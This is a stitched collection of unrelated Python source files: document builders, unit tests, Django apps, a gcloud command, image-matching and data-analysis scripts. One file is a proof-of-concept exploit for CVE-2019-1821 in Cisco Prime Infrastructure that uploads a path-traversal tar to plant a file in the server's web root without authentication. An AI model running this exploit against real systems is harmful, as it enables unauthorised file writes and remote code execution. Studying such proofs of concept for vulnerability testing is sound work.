def process_files(files: List[str], sat_types: List[str]) -> None:
"""processes list of files, calls process() one each pair"""
processed = []
for index, val in enumerate(files):
processed.extend(process(val, sat_types[index]))
send(processed)
remove(processed)
|
# stdlib
import pathlib
from pprint import pprint
# 3rd party
import astropy.units as u
# this package
import py2latex
from py2latex.glossaries import glossary_from_file
from py2latex.markdown_parser import load_markdown
from py2latex.sectioning import make_chapter
from py2latex.siunit import SI, si
chapters_list = []
for title, filename in [
(f"Chapter 0", "Chapter0.tex"),
(f"Chapter 1", "Chapter1.tex"),
(f"Chapter 2", "Chapter2.tex"),
]:
body = pathlib.Path(filename).read_text()
chapters_list.append(make_chapter(title, body=body))
text_md = load_markdown("text.md")
chapters_list.append(make_chapter(title=f"Markdown Chapter", body=text_md))
chapters_list.append(make_chapter(title=f"Introduction", body=load_markdown("introduction.md")))
kgms = u.kg * u.m / u.A / u.s
chapters_list.append(si(kgms))
l3vt3 = u.lux**3 * u.V / u.T**3
chapters_list.append(si(l3vt3))
chapters_list.append(SI(3 * l3vt3))
glossary = glossary_from_file(pathlib.Path("glossary.yaml"))
pprint(glossary)
chapters_list.append(r"\bigskip\huge{\texttt{py}$2$\LaTeX}")
py2latex.make_document("demo.tex", chapters_list, glossary=glossary)
|
#!/usr/bin/env python
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2014,2015,2016,2017 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Module for testing the del_static_route command."""
import unittest
if __name__ == "__main__":
import utils
utils.import_depends()
from brokertest import TestBrokerCommand
from machinetest import MachineTestMixin
class TestDelStaticRoute(MachineTestMixin, TestBrokerCommand):
def testdelroute1(self):
gw = self.net["routing1"].usable[-1]
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.250.0", "--prefixlen", "23"]
self.statustest(command)
def testdelroute1again(self):
gw = self.net["routing1"].usable[-1]
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.250.0", "--prefixlen", "23"]
out = self.notfoundtest(command)
self.matchoutput(out,
"Static Route to 192.168.250.0/23 using gateway "
"%s not found." % gw,
command)
def testdelroute1_personality(self):
gw = self.net["routing1"].usable[-1]
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.248.0", "--prefixlen", "24",
"--personality", "inventory"]
self.statustest(command)
def testdelroute2(self):
gw = self.net["routing2"].usable[-1]
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.252.0", "--prefixlen", "23"]
self.noouttest(command)
def testdelroute2_guess(self):
gw = self.net["routing2"].gateway
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.254.0", "--prefixlen", "24"]
self.noouttest(command)
def testdelroute3(self):
net = self.net["routing3"]
gw = net[3]
command = ["del", "static", "route", "--gateway", gw,
"--ip", "192.168.254.0", "--prefixlen", "24"]
self.noouttest(command)
def testdelroute4(self):
gw = self.net["unknown0"].gateway
command = ["del", "static", "route", "--gateway", gw,
"--ip", "250.250.0.0", "--prefixlen", "16"]
self.statustest(command)
def testverifynetwork(self):
command = ["show", "network", "--ip", self.net["routing1"].ip]
out = self.commandtest(command)
self.matchclean(out, "Static Route", command)
def testverifyunittest02(self):
command = ["show", "host", "--hostname", "unittest02.one-nyp.ms.com"]
out = self.commandtest(command)
self.matchclean(out, "Static Route", command)
def testverifyunittest26(self):
net = self.net["routing1"]
ip = net.usable[0]
command = ["cat", "--hostname", "unittest26.aqd-unittest.ms.com", "--data"]
out = self.commandtest(command)
self.searchoutput(out,
r'"system/network/interfaces/eth1" = nlist\(\s*'
r'"bootproto", "static",\s*'
r'"broadcast", "%s",\s*'
r'"fqdn", "unittest26-e1.aqd-unittest.ms.com",\s*'
r'"gateway", "%s",\s*'
r'"ip", "%s",\s*'
r'"netmask", "%s",\s*'
r'"network_environment", "internal",\s*'
r'"network_type", "unknown"\s*\)' %
(net.broadcast_address, net.gateway, ip, net.netmask),
command)
def testdelunittest27(self):
eth0_ip = self.net["unknown0"].usable[37]
eth1_ip = self.net["routing1"].usable[1]
self.delete_host("unittest27.aqd-unittest.ms.com", eth0_ip, "ut3c5n9",
eth1_ip=eth1_ip)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestDelStaticRoute)
unittest.TextTestRunner(verbosity=2).run(suite)
|
import mock
from .context import aiociscospark
class TestSparkAppClient:
def test_initialization(self, event_loop, credentials):
with mock.patch.object(aiociscospark.APIClient, 'http_client_class',
side_effect=aiociscospark.http_client.HTTPClient) as http_client_class_mock: # noqa
client = aiociscospark.APIClient(credentials, loop=event_loop)
assert isinstance(client.http_client, aiociscospark.http_client.HTTPClient)
http_client_class_mock.assert_called_once_with(credentials, loop=event_loop)
for svc in ['contents', 'licenses', 'messages', 'organizations', 'people', 'roles',
'room_memberships', 'rooms', 'team_memberships', 'teams', 'webhooks']:
assert isinstance(getattr(client, svc), aiociscospark.services.ApiService)
def test_get_client(event_loop, credentials):
client = aiociscospark.get_client(credentials, loop=event_loop)
assert isinstance(client, aiociscospark.APIClient)
|
from django.db import models
from django.utils import timezone
from django.urls import reverse
class Post(models.Model):
author = models.ForeignKey('auth.User',on_delete=models.CASCADE)
title = models.CharField(max_length = 250)
text = models.TextField()
create_date = models.DateTimeField(default = timezone.now())
published_date = models.DateTimeField(blank=True,null = True)
def publish(self):
self.published_date = timezone.now()
self.save()
def approved_comments(self):
return self.comments.filter(approved=True)
def __str__(self):
return self.title
def get_absolute_url(self):
return reverse('blog:post_detail', kwargs={'pk':self.pk})
class Comment(models.Model):
Post = models.ForeignKey('blog.Post',related_name='comments',on_delete=models.CASCADE)
author = models.CharField(max_length = 30)
text = models.TextField()
date = models.DateTimeField(default = timezone.now())
approved = models.BooleanField(default = False)
def __str__(self):
return self.text
def approve(self):
self.approved=True
self.save()
print('comment approved!')
def get_absolute_url(self):
return reverse('blog:post_list')
|
from rest_framework.generics import get_object_or_404
from rest_framework.mixins import ListModelMixin
from rest_framework.reverse import reverse
from rest_framework.viewsets import GenericViewSet
from drf_hal.views import HalRetrieveModelMixin
from registronavale import relations
from . import models
from . import serializers
class SearchShips(ListModelMixin, GenericViewSet):
serializer_class = serializers.ShipSerializer
def get_queryset(self):
query = self.request.query_params['q']
return models.Ship.objects.filter(name__icontains=query)
def retrieve(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class Company(HalRetrieveModelMixin, GenericViewSet):
queryset = models.Company.objects.all()
serializer_class = serializers.CompanySerializer
class CompanyShips(ListModelMixin, GenericViewSet):
serializer_class = serializers.ShipSerializer
def get_queryset(self):
queryset = models.Company.objects.prefetch_related('ships')
company = get_object_or_404(queryset, pk=self.kwargs['pk'])
return company.ships.all()
def retrieve_model(self, request, *args, **kwargs):
return self.list(request, *args, **kwargs)
class Ship(HalRetrieveModelMixin, GenericViewSet):
queryset = models.Ship.objects.all()
lookup_field = 'imo'
serializer_class = serializers.ShipSerializer
|
import click
from ..api import GithubException
from .utils import repo_manager
@click.command()
@click.option(
"--sandbox",
is_flag=True,
help="Validate only on sandbox/deploy branch",
default=False,
)
@click.option(
"--yes-no",
is_flag=True,
help="Return yes for version is good, no for version is not good",
default=False,
)
@click.pass_context
def validate(ctx, sandbox, yes_no):
"""Check if version of repository is semantic
"""
m = repo_manager(ctx)
if not sandbox or m.can_release("sandbox"):
try:
version = m.validate_version()
click.echo("yes" if yes_no else version)
except GithubException:
if yes_no:
return click.echo("no")
raise
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""`gcloud iot devices update` command."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.cloudiot import devices
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.iot import flags
from googlecloudsdk.command_lib.iot import resource_args
from googlecloudsdk.command_lib.iot import util
from googlecloudsdk.core import log
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Update(base.UpdateCommand):
"""Update an existing device."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
The following command updates the device 'my-device' in device registry 'my-registry' in region 'us-central1'. It blocks the device and sets metadata values.
$ {command} my-device --region=us-central1 --registry=my-registry --blocked --metadata=key1=value1,key2=value2
""",
}
@staticmethod
def Args(parser):
resource_args.AddDeviceResourceArg(parser, 'to update')
flags.AddDeviceFlagsToParser(parser, default_for_blocked_flags=False)
flags.AddLogLevelFlagToParser(parser)
def Run(self, args):
client = devices.DevicesClient()
device_ref = args.CONCEPTS.device.Parse()
metadata = util.ParseMetadata(args.metadata,
args.metadata_from_file,
client.messages)
log_level = util.ParseLogLevel(
args.log_level, client.messages.Device.LogLevelValueValuesEnum)
device = client.Patch(device_ref,
blocked=args.blocked,
metadata=metadata,
log_level=log_level)
log.UpdatedResource(device_ref.Name(), 'device')
return device
@base.ReleaseTracks(base.ReleaseTrack.ALPHA,
base.ReleaseTrack.BETA)
class UpdateAlpha(base.UpdateCommand):
"""Update an existing device."""
detailed_help = {
'DESCRIPTION':
'{description}',
'EXAMPLES':
"""\
The following command updates the device 'my-device' in device registry 'my-registry' in region 'us-central1'. It blocks the device and sets metadata values.
$ {command} my-device --region=us-central1 --registry=my-registry --blocked --metadata=key1=value1,key2=value2
""",
}
@staticmethod
def Args(parser):
resource_args.AddDeviceResourceArg(parser, 'to update')
flags.AddDeviceFlagsToParser(parser, default_for_blocked_flags=False)
flags.GATEWAY_AUTH_METHOD_ENUM_MAPPER.choice_arg.AddToParser(parser)
flags.AddLogLevelFlagToParser(parser)
def Run(self, args):
client = devices.DevicesClient()
device_ref = args.CONCEPTS.device.Parse()
metadata = util.ParseMetadata(args.metadata,
args.metadata_from_file,
client.messages)
auth_method = flags.GATEWAY_AUTH_METHOD_ENUM_MAPPER.GetEnumForChoice(
args.auth_method)
log_level = util.ParseLogLevel(
args.log_level, client.messages.Device.LogLevelValueValuesEnum)
device = client.Patch(device_ref,
blocked=args.blocked,
metadata=metadata,
auth_method=auth_method,
log_level=log_level)
log.UpdatedResource(device_ref.Name(), 'device')
return device
|
from datetime import datetime
from django.test import TestCase
from django.test.client import Client
from corehq.apps.receiverwrapper.models import RepeatRecord, AppStructureRepeater
from corehq.apps.app_manager.models import Application
class TestAppStructureRepeater(TestCase):
def setUp(self):
self.client = Client()
self.domain = 'bedazzled'
self.forwarding_url = 'http://not-a-real-url-at-all'
def test_repeat_record_created(self):
'''
Tests that whenever an application with a repeater is saved that a repeat record is created.
'''
application = Application(domain=self.domain)
application.save()
repeat_records = RepeatRecord.all(domain=self.domain, due_before=datetime.utcnow())
self.assertEqual(len(repeat_records), 0)
app_structure_repeater = AppStructureRepeater(domain=self.domain, url=self.forwarding_url)
app_structure_repeater.save()
application.save()
repeat_records = RepeatRecord.all(domain=self.domain, due_before=datetime.utcnow())
self.assertEqual(len(repeat_records), 1)
for repeat_record in repeat_records:
self.assertEqual(repeat_record.url, self.forwarding_url)
self.assertEqual(repeat_record.get_payload(), application.get_id)
repeat_record.delete()
application.delete()
app_structure_repeater.delete()
|
"""
Tests for decomposing documents into basis vectors
"""
import unittest
from os.path import join
from crossmap.crossmap import Crossmap
from crossmap.tools import read_yaml_documents
from .tools import remove_crossmap_cache
data_dir = join("tests", "testdata")
config_file= join(data_dir, "config-similars.yaml")
dataset_file = join(data_dir, "dataset-similars.yaml")
# read the docs from the dataset
similars_docs = read_yaml_documents(dataset_file)
class CrossmapDecomposeTests(unittest.TestCase):
"""Decomposing objects onto targets - single documents"""
@classmethod
def setUpClass(cls):
cls.crossmap = Crossmap(config_file)
cls.crossmap.build()
@classmethod
def tearDownClass(cls):
remove_crossmap_cache(data_dir, "crossmap_similars")
def test_decompose_BD(self):
"""object matching against B and D"""
doc = dict(data="Bob Bravo Delta David. Bob Bravo Bernard")
# standard nearest neighbors should return two Bs
prediction = self.crossmap.search(doc, "targets", n=2)
self.assertTrue("B1" in prediction["targets"])
self.assertTrue("B2" in prediction["targets"])
self.assertEqual(len(prediction["targets"]), 2)
# decomposition should give one B and one D
decomposition = self.crossmap.decompose(doc, "targets", n=2)
BD = set(["B1", "B2", "D1", "D2"])
self.assertTrue(decomposition["targets"][0] in BD)
self.assertTrue(decomposition["targets"][1] in BD)
def test_decompose_CC(self):
"""object matching against Cs"""
doc = dict(data="Charlie Christine Camilla. Bob Charlie Charlie")
# standard nearest neighbors should return two Cs
prediction = self.crossmap.search(doc, "targets", n=2)
self.assertTrue("C1" in prediction["targets"])
self.assertTrue("C2" in prediction["targets"])
self.assertEqual(len(prediction["targets"]), 2)
# decomposition should also give Cs
decomposition = self.crossmap.decompose(doc, "targets", n=2)
self.assertTrue(decomposition["targets"][0] in set(["C1", "C2"]))
self.assertTrue(decomposition["targets"][1] in set(["C1", "C2"]))
def test_decompose_empty_doc(self):
"""decomposing an empty document should not raise exceptions"""
doc = dict(data="", aux_pos="")
decomposition = self.crossmap.decompose(doc, "targets", n=3)
self.assertEqual(decomposition["targets"], [])
self.assertEqual(decomposition["coefficients"], [])
def test_decompose_factors(self):
"""decomposition using a factor suggestion"""
# this document is most similar to B2 and C1
doc = dict(data="Bob Bravo Benjamin Charlie Clare. Bob Bravo.")
# standard decomposition
plain = self.crossmap.decompose(doc, "targets", n=2)
self.assertListEqual(list(plain["targets"]), ["B2", "C1"])
# decomposition can take a factor suggestion
result = self.crossmap.decompose(doc, "targets", n=2, factors=["B1"])
self.assertListEqual(list(result["targets"]), ["B1", "C1"])
class CrossmapDecomposeBatchTests(unittest.TestCase):
"""Decomposing objects onto targets - in batch"""
@classmethod
def setUpClass(cls):
cls.crossmap = Crossmap(config_file)
cls.crossmap.build()
cls.targets = similars_docs
@classmethod
def tearDownClass(cls):
remove_crossmap_cache(data_dir, "crossmap_similars")
def test_decompose_documents(self):
"""exact document matches should produce short decomposition vectors"""
targets_file = self.crossmap.settings.data.collections["targets"]
result = self.crossmap.decompose_file(targets_file, "targets", 2)
for i in range(len(result)):
iresult = result[i]
# all targets should match to themselves only, with coeff 1.0
self.assertTrue(iresult["targets"][0] in self.targets)
self.assertEqual(len(iresult["targets"]), 1)
self.assertEqual(len(iresult["coefficients"]), 1)
self.assertAlmostEqual(iresult["coefficients"][0], 1.0)
|
# Note that this requires yt 4!
import yt
import contextlib
from collections import defaultdict
ds = yt.load_sample("snapshot_033")
print(ds.index)
reg = ds.r[0.25:0.5, 0.5:0.75, 0.2:0.25]
for chunk in reg.chunks([], "io"):
print(chunk)
# So what has just happened is that `_identify_base_chunk` was called, and that
# creates a list of base chunk objects. We can see this with a function
# decorator:
def print_input_output(func):
def _func(*args, **kwargs):
print(f"Entering {func.__name__}")
for i, a in enumerate(args):
print(f" arg {i}: {a}")
for k, v in sorted(kwargs.items()):
print(f" {k} = {v}")
rv = func(*args, **kwargs)
print(f"Leaving {func.__name__}")
print(f" return value: {rv}")
return rv
return _func
ds.index._identify_base_chunk = print_input_output(ds.index._identify_base_chunk)
reg = ds.r[0.25:0.5, 0.5:0.75, 0.2:0.25]
reg["density"]
# When we do this, note that what is supplied is the YTRegion object, and what
# is returned is ... None! That's because the index object modifies the
# YTRegion object in place.
def print_chunk_info(dobj, indent = 0):
space = indent * " "
print(f"{space}{dobj._current_chunk=}")
print(f"{space}{dobj._current_chunk.chunk_type=}")
print(f"{space}{dobj._current_chunk.data_size=}")
print(f"{space}{dobj._current_chunk.dobj=}")
print(f"{space}{len(dobj._current_chunk.objs)=} of type {set(type(_) for _ in dobj._current_chunk.objs)}")
# Let's look at what this looks like for chunking a data object. Note that
# what happens here is that we see the current_chunk for each subchunk.
reg = ds.r[0.1:0.2,0.1:0.2,0.1:0.2]
for i, chunk in enumerate(reg.chunks([], "io")):
print()
print(f" chunk {i}")
print_chunk_info(reg, 4)
# Let's try now what happens if we look at current chunk *after* we access a data field.
print_chunk_info(reg, 0)
# So what we see is that the result of _identify_base_chunk has been popped
# into the region as the _current_chunk.
#
# A lot of this happens in the `_chunked_read` function, which is a context
# manager that tracks objects and fields.
#
# It's a little tricky to instrument this because it's a context manager. But,
# if we instrument it with just a print statement, we can see when and how it's
# called.
#
# @contextmanager
# def _chunked_read(self, chunk):
# # There are several items that need to be swapped out
# # field_data, size, shape
# obj_field_data = []
# if hasattr(chunk, "objs"):
# for obj in chunk.objs:
# obj_field_data.append(obj.field_data)
# obj.field_data = YTFieldData()
# old_field_data, self.field_data = self.field_data, YTFieldData()
# old_chunk, self._current_chunk = self._current_chunk, chunk
# old_locked, self._locked = self._locked, False
# yield
# self.field_data = old_field_data
# self._current_chunk = old_chunk
# self._locked = old_locked
# if hasattr(chunk, "objs"):
# for obj in chunk.objs:
# obj.field_data = obj_field_data.pop(0)
levels = {'level': 0} # make it mutable
def trace_chunked_read(func):
space =" "
@contextlib.contextmanager
def _func(self, *args, **kwargs):
levels['level'] += 1
print(f"{space * levels['level']}Entering chunked_read at level {levels['level']}")
yield func(self, *args, **kwargs)
print(f"{space * levels['level']}Exiting chunked_read from level {levels['level']}")
levels['level'] -= 1
return _func
reg = ds.r[0.1:0.2,0.1:0.2,0.1:0.2]
reg._chunked_read = trace_chunked_read(reg._chunked_read)
reg["density"]
for chunk_index, chunk in enumerate(reg.chunks([], "io")):
field = reg["density"]
print(f"{chunk_index=} with {field.size=}")
# We do this to demonstrate something that happens much more frequently in the context of
print("\n\nNow, we run it again, with a layered chunking.\n")
levels = defaultdict(lambda: 0)
for chunk in reg.chunks([], "all"):
for subchunk in reg.chunks([], "io"):
print(f"{chunk_index=} with {field.size=}")
# This doesn't prove that *much* except that we have a layered chunking system.
# What we want to take a look at is how the chunking process works.
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 19 23:27:24 2020
@author: dkloe
"""
import numpy as np
import cv2
from matplotlib import pyplot as plt
img1 = cv2.imread('T_sensor_right_up.png', 0) # query Image
img2 = cv2.imread('Capture.png',0) # target Image
# Initiate SIFT detector
orb = cv2.ORB_create()
# find the keypoints and descriptors with ORB
kp1, des1 = orb.detectAndCompute(img1,None)
kp2, des2 = orb.detectAndCompute(img2,None)
# create BFMatcher object
bf = cv2.BFMatcher(cv2.NORM_HAMMING, crossCheck=True)
# Match descriptors.
matches = bf.match(des1,des2)
# Sort them in the order of their distance.
matches = sorted(matches, key = lambda x:x.distance)
good_matches = matches[:10]
src_pts = np.float32([ kp1[m.queryIdx].pt for m in good_matches ]).reshape(-1,1,2)
dst_pts = np.float32([ kp2[m.trainIdx].pt for m in good_matches ]).reshape(-1,1,2)
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC,5.0)
matchesMask = mask.ravel().tolist()
h,w = img1.shape[:2]
pts = np.float32([ [0,0],[0,h-1],[w-1,h-1],[w-1,0] ]).reshape(-1,1,2)
dst = cv2.perspectiveTransform(pts,M)
dst += (w, 0) # adding offset
draw_params = dict(matchColor = (0,255,0), # draw matches in green color
singlePointColor = None,
matchesMask = matchesMask, # draw only inliers
flags = 2)
img3 = cv2.drawMatches(img1,kp1,img2,kp2,good_matches, None,**draw_params)
# Draw bounding box in Red
img3 = cv2.polylines(img3, [np.int32(dst)], True, (0,0,255),3, cv2.LINE_AA)
cv2.imshow("result", img3)
cv2.waitKey()
# or another option for display output
#plt.imshow(img3, 'result'), plt.show() |
from numpy import maximum, percentile, full, nan, where, tile, inf, isnan
from skimage.measure import regionprops
from neurofinder import match, centers, shapes
from regional import many
from extraction.model import ExtractionModel
from .utils import norm
from .CC import CC
def compare(model, modelReference, threshold):
"""
Compare two extraction models.
Parameters
----------
model : ExtractionModel
Model for comparision.
modelReferrence : ExtractionModel
Reference model to be compared to, can be ground truth.
threshold : float
Distance threshold for matching sources.
"""
recall, precision = centers(modelReference.regions, model.regions, threshold)
inclusion, exclusion = shapes(modelReference.regions, model.regions, threshold)
if recall == 0 and precision == 0:
combined = 0
else:
combined = 2 * (recall * precision) / (recall + precision)
count = model.regions.count
return {'count': count,
'combined': combined,
'recall':recall,
'precision':precision,
'inclusion':inclusion,
'exclusion':exclusion,
'threshold':threshold}
def overlay(model, image=None, compare=None, threshold=inf, correct=False):
"""
Overlay regions onto reference image, with optional comparison regions.
Parameters
----------
model : ExtractionModel
image : array-like, optional, default = None
Base image, can provide a 2d array,
if unspecified will be black.
modelCompare : ExtractionModel, default = None
Regions to be compared to if provided.
threshold : float, default = inf
Distance threshold for matching sources.
correct : bool, default = False
If True and a comparision given will only show correct regions
"""
if image is not None:
if image.max() > 1:
im = norm(image)
else:
im = image
size = im.shape
else:
size = (max([r.bbox[2] for r in model.regions])+1, max([r.bbox[3] for r in model.regions])+1)
if compare is not None:
sizeCompare = (max([r.bbox[2] for r in compare.regions])+1, max([r.bbox[3] for r in compare.regions])+1)
size = (maximum(size[0], sizeCompare[0]), maximum(size[1], sizeCompare[1]))
im = full(size, 0.0)
if compare is not None:
matches = match(model.regions, compare.regions, threshold)
matchesCompare = full(compare.regions.count,nan)
for ii in where(~isnan(matches))[0]:
matchesCompare[matches[ii]] = ii
if any(~isnan(matches)):
hits = many([model.regions[i] for i in where(~isnan(matches))[0]])
h = hits.mask(size, background='black', fill=None, stroke=[0, 0.7, 0])
else:
h = full((size[0], size[1], 3), 0.0)
if any(isnan(matches)):
falseAlarms = many([model.regions[i] for i in where(isnan(matches))[0]])
fA = falseAlarms.mask(size, background='black', fill=None, stroke=[0.7, 0, 0])
else:
fA = full((size[0], size[1], 3), 0.0)
if any(~isnan(matchesCompare)):
truePositives = many([compare.regions[i] for i in where(~isnan(matchesCompare))[0]])
tP = truePositives.mask(size, background='black', fill=None, stroke=[0, 0, 0.7])
else:
tP = full((size[0], size[1], 3), 0.0)
if any(isnan(matchesCompare)):
misses = many([compare.regions[i] for i in where(isnan(matchesCompare))[0]])
m = misses.mask(size, background='black', fill=None, stroke=[0.7, 0.7, 0])
else:
m = full((size[0], size[1], 3), 0.0)
if correct:
mask = maximum(tP, h)
else:
mask = maximum(maximum(maximum(tP, fA), h), m)
else:
mask = model.regions.mask(size, background='black', fill=None, stroke=[0, 0.7, 0])
base = tile(im,(3,1,1)).transpose(1,2,0)
return maximum(base, mask)
def filter_shape(model, min_diameter=7, max_diameter=13, min_eccentricity=0.2):
"""
Filter extraction model regions based on shape criterion.
Parameters
----------
model : ExtractionModel.
min_diameter : float, default 7.
Minimum allowed diameter of regions
max_diameter : float, default 13.
Maxium allowed diameter of regions
min_eccentricity : float, default 0.2.
Minimum allowed eccentricity of regions
"""
regions = []
for region in model.regions:
mask = region.mask(fill=[1, 1, 1], background=[0, 0, 0])[:,:,0]
props = regionprops(mask.astype('int'))[0]
if (props.eccentricity > min_eccentricity) and (props.equivalent_diameter > min_diameter) and (props.equivalent_diameter < max_diameter):
regions.append(region)
return ExtractionModel(regions)
|
import requests
import random
import string
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Cisco Prime Infrastructure Unauthorized RCE''',
"description": '''Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.''',
"severity": "critical",
"references": [
"https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html",
"https://nvd.nist.gov/vuln/detail/CVE-2019-1821"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2019-1821",
"cwe-id": "CWE-20"
},
"metadata":{
"vuln-target": "",
"shodan-query":'''http.title:"prime infrastructure"'''
},
"tags": ["cve", "cve2019", "rce", "fileupload", "unauth", "intrusive", "cisco"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
randstr = gen_randstr()
try:
url = format_url(url)
path = """/servlet/UploadServlet"""
method = "POST"
data = """--871a4a346a547cf05cb83f57b9ebcb83
Content-Disposition: form-data; name="files"; filename="test.tar"
../../opt/CSCOlumos/tomcat/webapps/ROOT/test.txt0000644000000000000000000000000400000000000017431 0ustar 00000000000000{randstr}
--871a4a346a547cf05cb83f57b9ebcb83--""".format(randstr=randstr)
headers = {'Accept-Encoding': 'gzip, deflate', 'Primary-IP': '127.0.0.1', 'Filename': 'test.tar', 'Filesize': '10240', 'Compressed-Archive': 'false', 'Destination-Dir': 'tftpRoot', 'Filecount': '1', 'Content-Length': '269', 'Content-Type': 'multipart/form-data; boundary=871a4a346a547cf05cb83f57b9ebcb83'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/test.txt"""
method = "GET"
data = """"""
headers = {}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if resp1.status_code == 200 and randstr in resp1.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
def gen_randstr(length):
return ''.join(random.sample(string.ascii_letters + string.digits, length)) |
import re
import numpy as np
from sklearn.base import BaseEstimator, TransformerMixin
from extractnet.util import get_and_union_features
from sklearn.decomposition import PCA
class AuthorFeatures(BaseEstimator, TransformerMixin):
"""
An sklearn-style transformer that takes an ordered sequence of ``Block`` objects
and returns a 2D array of Author-based features, where each value can be varies
"""
__name__ = 'author'
# tokens that we search for in each block's CSS attribute
# first 'id', then 'class'
attribute_tags = (
'div', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'html', 'p', 'span', 'table', 'author',
)
tag_attributes = (
'rel', 'id', 'class', 'itemprop', 'content', 'name'
)
name_attributes = re.compile(r'[author|name|publisher]')
def __init__(self, vectorizer, text_vectorizer,
features=('kohlschuetter', 'weninger', 'readability', 'css'),
pca_n_components=10
):
self.vectorizer = vectorizer
self.text_vectorizer = text_vectorizer
self.feature = get_and_union_features(features)
self.pca = PCA(n_components=pca_n_components)
def fit(self, blocks, y=None):
"""
This method returns the current instance unchanged, since no fitting is
required for this ``Feature``. It's here only for API consistency.
"""
feature_vecs = np.stack([np.concatenate((self.transform_block(block, idx, len(blocks)), dragnet_feat[idx]) ) for idx, block in enumerate(blocks) ])
self.pca.fit(feature_vecs[:, 8:])
return self
def fit_transform(self, blocks, y=None):
dragnet_feat = self.feature.transform(blocks)
feature_vecs = np.stack([np.concatenate((self.transform_block(block, idx, len(blocks)), dragnet_feat[idx]) ) for idx, block in enumerate(blocks) ])
pca_feat = self.pca.fit_transform(feature_vecs[:, 8:])
feature_vecs = np.concatenate([feature_vecs[:, :8], pca_feat ], 1)
# feature_vecs = [self.transform_block(block) for idx, block in enumerate(blocks) ]
return np.concatenate([feature_vecs, dragnet_feat], 1)
def transform_block(self, block, block_pos, total_blocks, encoding='utf-8'):
css_text = ''
other_text = ''
if b'css' in block.css:
css_text += block.css[b'css'].decode(encoding)+' '
if b'id' in block.css:
css_text += block.css[b'id'].decode(encoding)+' '
# tag_multi_hot is useless by catboost
# 'rel', 'id', 'class', 'itemprop', 'content', 'name'
# css TF-IDF : useless
features = self.vectorizer.transform([ css_text+' '+other_text ]).toarray().flatten()
# content text TFIDF
text_features = self.text_vectorizer.transform([block.text]).toarray().flatten()
handcraft_features = [0, 0, 0, 0, 0, 0, 0, 0, 0]
if 'author' in css_text.lower() or 'author' in other_text.lower():
handcraft_features[0] = 1
if b'block_start_element' in block.features:
tag_type = block.features[b'block_start_element'].tag
if tag_type in self.attribute_tags:
handcraft_features[1] = self.attribute_tags.index(tag_type) + 1
handcraft_features[2] = len(css_text+other_text)
handcraft_features[3] = len(block.text)
if self.name_attributes.search(css_text):
handcraft_features[5] = 1
if self.name_attributes.search(other_text):
handcraft_features[4] = 1
handcraft_features[6] = block.link_density / block.text_density
handcraft_features[7] = block_pos / total_blocks
handcraft_features[8] = total_blocks
# handcraft_features : 0-3, tag_multi_hot: 4-9
return np.concatenate((handcraft_features, text_features, features))
def transform(self, blocks, y=None, encoding='utf-8'):
"""
Transform an ordered of blocks into a 2D features matrix with
shape (num blocks, num features).
Args:
blocks (List[Block]): as output by :class:`Blockifier.blockify`
y (None): This isn't used, it's only here for API consistency.
Returns:
`np.ndarray`: 2D array of shape (num blocks, num CSS attributes),
where values are either 0 or 1, indicating the absence or
presence of a given token in a CSS attribute on a given block.
"""
dragnet_feat = self.feature.transform(blocks)
feature_vecs = np.stack([np.concatenate((self.transform_block(block, idx, len(blocks), encoding=encoding), dragnet_feat[idx]) ) for idx, block in enumerate(blocks) ])
pca_feat = self.pca.transform(feature_vecs[:, 8:])
feature_vecs = np.concatenate([feature_vecs[:, :8], pca_feat ], 1)
# feature_vecs = [self.transform_block(block) for idx, block in enumerate(blocks) ]
return np.concatenate([feature_vecs, dragnet_feat], 1)
|
""" Utility methods """
import calendar
from datetime import datetime
from dateutil.parser import parse
from dateutil.relativedelta import relativedelta
from dateutil.tz import tzlocal, tzutc
from decimal import Decimal
